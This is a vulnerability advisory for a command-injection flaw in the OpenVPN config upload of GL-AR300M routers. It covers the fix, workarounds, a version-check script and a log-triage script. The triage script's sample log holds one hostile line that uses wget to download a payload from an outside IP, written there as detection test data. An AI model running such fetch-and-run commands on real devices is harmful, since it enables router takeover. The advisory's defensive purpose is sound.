CVE-2023-46456

9.8 CRITICAL

📋 TL;DR

This vulnerability allows remote attackers to execute arbitrary shell commands on GL.iNET GL-AR300M routers by exploiting improper input validation in the OpenVPN client file upload functionality. Attackers can gain full control of affected routers, potentially compromising network security and connected devices. Only users of GL-AR300M routers with firmware version 3.216 are affected.

💻 Affected Systems

Products:
  • GL.iNET GL-AR300M
Versions: Firmware 3.216
Operating Systems: OpenWrt-based firmware
Default Config Vulnerable: ⚠️ Yes
Notes: Only affects routers with OpenVPN client functionality enabled and accessible.

📦 What is this software?

The GL.iNET GL-AR300M is a compact travel router that ships with GL.iNET's OpenWrt-based firmware and a vendor web admin interface. Its built-in OpenVPN client is configured by uploading an OpenVPN (.ovpn) configuration file through that interface; that upload handler is the component this CVE concerns.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete router compromise leading to network takeover, credential theft, man-in-the-middle attacks, and lateral movement to connected devices.

🟠

Likely Case

Router compromise allowing network monitoring, DNS hijacking, and credential harvesting from connected devices.

🟢

If Mitigated

Limited impact if router is behind firewall with restricted WAN access and proper network segmentation.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation requires network access to the router's web admin interface, which hosts the OpenVPN client configuration upload. The OpenVPN tunnel port itself is not the attack surface described here; an attacker who can reach the admin UI (LAN, Wi-Fi, or an exposed WAN-side admin port) is in position.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: A firmware release newer than 3.216 (this page does not name the exact fixed build; check the vendor's release notes for the GL-AR300M)

Vendor Advisory: https://www.gl-inet.com/

Restart Required: Yes

Instructions:

1. Log into router admin interface
2. Navigate to System > Firmware
3. Check for updates
4. Install latest firmware
5. Reboot router

🔧 Temporary Workarounds

Disable OpenVPN client

linux

Stop and disable the OpenVPN client service so that an uploaded configuration is never started. The section name custom_config is the stock OpenWrt /etc/config/openvpn entry; GL.iNET firmware may use a different section, so list the sections first. This does not remove the vulnerable upload endpoint itself, so combine it with the web interface restriction below.

uci show openvpn                            # find the client section name(s)
uci set openvpn.custom_config.enabled='0'   # adjust the section name to match
uci commit openvpn
/etc/init.d/openvpn stop
/etc/init.d/openvpn disable

Restrict web interface access

linux

Limit access to the router admin interface (TCP 80/443) to one trusted IP. The rule is inserted at the top of INPUT with -I because OpenWrt's own zone chains already ACCEPT LAN traffic earlier in the chain, so a rule appended with -A would never be reached. Loopback is exempted so local services keep working. The rule does not survive a reboot or a firewall reload (/etc/init.d/firewall restart); add it to /etc/firewall.user or a uci firewall rule to persist it, and repeat with ip6tables if the admin UI is reachable over IPv6.

iptables -I INPUT 1 -p tcp -m multiport --dports 80,443 ! -i lo ! -s TRUSTED_IP -j DROP

🧯 If You Can't Patch

  • Place router behind firewall with strict inbound rules blocking all unnecessary ports
  • Implement network segmentation to isolate router from critical systems

🔍 How to Verify

Check if Vulnerable:

Check firmware version via web interface at System > Firmware or run 'cat /etc/glversion' on router shell

Check Version:

cat /etc/glversion

Verify Fix Applied:

Confirm the version reported by /etc/glversion (or System > Firmware) is newer than 3.216. Do not "test" the OpenVPN upload with a live command-injection payload on a production router; use the version check as the acceptance criterion.
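The version check above, as an added example that is not GL.iNET code: a POSIX sh script that compares the string in /etc/glversion (the file this page names) against 3.216 and reports whether a fixed release is installed. It uses only the facts on this page (3.216 is affected; the fix is a later release) and avoids sort -V and bash-only syntax so it runs on the router's BusyBox shell as well as on a workstation. The script filename glversion_check.sh in the final case statement is an assumption.

```shell
#!/bin/sh
# Added example, not GL.iNET code: decide from a firmware version string whether
# the fix for CVE-2023-46456 should be present. Pure POSIX sh so it runs on the
# router's BusyBox shell (no sort -V, no bash arrays).

# Compare two dotted version strings numerically, component by component.
# Prints -1, 0 or 1 for a<b, a=b, a>b. Missing components count as 0 and a
# non-numeric suffix (e.g. "3.216-beta") is ignored within its component.
vercmp() {
    a="$1"; b="$2"
    while [ -n "$a" ] || [ -n "$b" ]; do
        ah=${a%%.*}; if [ "$ah" = "$a" ]; then a=""; else a=${a#*.}; fi
        bh=${b%%.*}; if [ "$bh" = "$b" ]; then b=""; else b=${b#*.}; fi
        ah=${ah%%[!0-9]*}; bh=${bh%%[!0-9]*}      # keep the leading digits only
        ah=${ah:-0}; bh=${bh:-0}
        if [ "$ah" -lt "$bh" ]; then printf '%s\n' -1; return 0; fi
        if [ "$ah" -gt "$bh" ]; then printf '%s\n' 1; return 0; fi
    done
    printf '%s\n' 0
}

# True (exit 0) when VERSION is strictly newer than 3.216, the only version the
# page lists as affected. The fixed release number is not given on the page, so
# "newer than 3.216" is the best test available.
is_fixed() {
    case "$(vercmp "$1" 3.216)" in
        1) return 0 ;;
        *) return 1 ;;
    esac
}

# Read the version from /etc/glversion (the file this page names), or from a
# file passed as $1, and report. Exit 0 = fixed, 1 = not fixed, 2 = unreadable.
check_glversion() {
    f="${1:-/etc/glversion}"
    if [ ! -r "$f" ]; then
        echo "cannot read $f; run this on the router (or pass a file)" >&2
        return 2
    fi
    v=$(head -n 1 "$f" | tr -d '[:space:]')
    if is_fixed "$v"; then
        echo "firmware $v is newer than 3.216: fix expected"
        return 0
    fi
    echo "firmware $v is not newer than 3.216: fix for CVE-2023-46456 not present"
    return 1
}

# Run the check only when executed as a script (assumed name), not when sourced.
case "${0##*/}" in
    glversion_check.sh) check_glversion "$@" ;;
esac
```

Copy the script to the router with scp and run it there, or run it on a workstation against a file containing the version string you read from the web UI; a non-zero exit code is the "still vulnerable" signal you can wire into an inventory script.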

📡 Detection & Monitoring

Log Indicators:

  • Unusual OpenVPN configuration file uploads
  • Suspicious shell commands in system logs
  • Unexpected process execution

Network Indicators:

  • Unusual outbound connections from router
  • DNS queries to malicious domains
  • Port scanning originating from router

SIEM Query:

source="router.log" AND (("openvpn" AND "upload") OR ("sh" AND "-c"))

The outer parentheses matter: without them AND binds tighter than OR and the query degrades to (router.log AND openvpn AND upload) OR (sh AND -c), which matches every "sh -c" in every log source. Expect the "sh" AND "-c" clause to be noisy on its own (cron jobs, init scripts); scope it to the openvpn process or the web daemon before alerting on it.
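The two log indicators and the SIEM query above, applied to syslog-style lines as an added example (not code from the original page): an awk-based triage that flags OpenVPN configuration uploads and a shell spawned by the OpenVPN client, while ignoring the "sh -c" lines that cron and init scripts produce. The message formats, process names and the sample log are constructed for this example; GL.iNET's real web daemon and openvpn messages may differ, so adjust the patterns to what logread on your router actually shows. The script filename scan_router_log.sh is an assumption.

```shell
#!/bin/sh
# Added example, not part of the original page: apply this page's two log
# indicators to syslog-style lines. Message formats below are assumed.

# Print matching lines prefixed with the indicator that fired.
# Rule 1: an OpenVPN-related upload event from the web interface.
# Rule 2: "sh -c" on a line that also mentions openvpn. Matching "sh -c" alone,
#         as the page's SIEM query does, flags every cron job and init script.
# The shell regex is passed with -v so the '/' inside the bracket expression
# cannot be mistaken for the end of a regex literal on older awks.
scan_router_log() {
    awk -v shre='(^|[ \t/])sh[ \t]+-c' '
        tolower($0) ~ /openvpn/ && tolower($0) ~ /upload/ { print "UPLOAD " $0; next }
        tolower($0) ~ /openvpn/ && $0 ~ shre               { print "SHELL  " $0; next }
    ' "$1"
}

# Number of flagged lines, as a plain integer.
count_hits() {
    scan_router_log "$1" | wc -l | tr -d ' '
}

# Constructed sample log (not captured from a device): two lines should fire
# (the upload and the openvpn-spawned shell), four should not, including a
# cron "sh -c" that the tightened rule deliberately ignores.
write_sample_log() {
    cat > "$1" <<'EOF'
Nov 12 10:01:02 GL-AR300M cron.info crond[812]: USER root pid 4120 cmd /bin/sh -c /usr/bin/uptime
Nov 12 10:02:15 GL-AR300M daemon.info httpd[601]: openvpn client: config upload from 192.168.8.100 saved as /etc/openvpn/custom.ovpn
Nov 12 10:02:16 GL-AR300M daemon.notice openvpn(custom)[4133]: OpenVPN 2.5.3 mips-openwrt-linux-gnu [SSL (OpenSSL)] [LZO] [EPOLL]
Nov 12 10:02:17 GL-AR300M daemon.notice openvpn(custom)[4133]: /bin/sh -c "wget http://203.0.113.5/u -O /tmp/u"
Nov 12 10:02:18 GL-AR300M daemon.notice openvpn(custom)[4133]: Initialization Sequence Completed
Nov 12 10:05:00 GL-AR300M daemon.info httpd[601]: GET /cgi-bin/api/router/status from 192.168.8.100
EOF
}

# Usage when run directly (assumed script name): scan a saved logread dump.
case "${0##*/}" in
    scan_router_log.sh) scan_router_log "$1" ;;
esac
```

On the device, `logread > /tmp/router.log` followed by `scan_router_log /tmp/router.log` gives the same two-rule triage; on a SIEM, the same scoping (openvpn AND upload, or openvpn AND sh -c) is what keeps the "sh -c" clause from paging you for every cron run.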
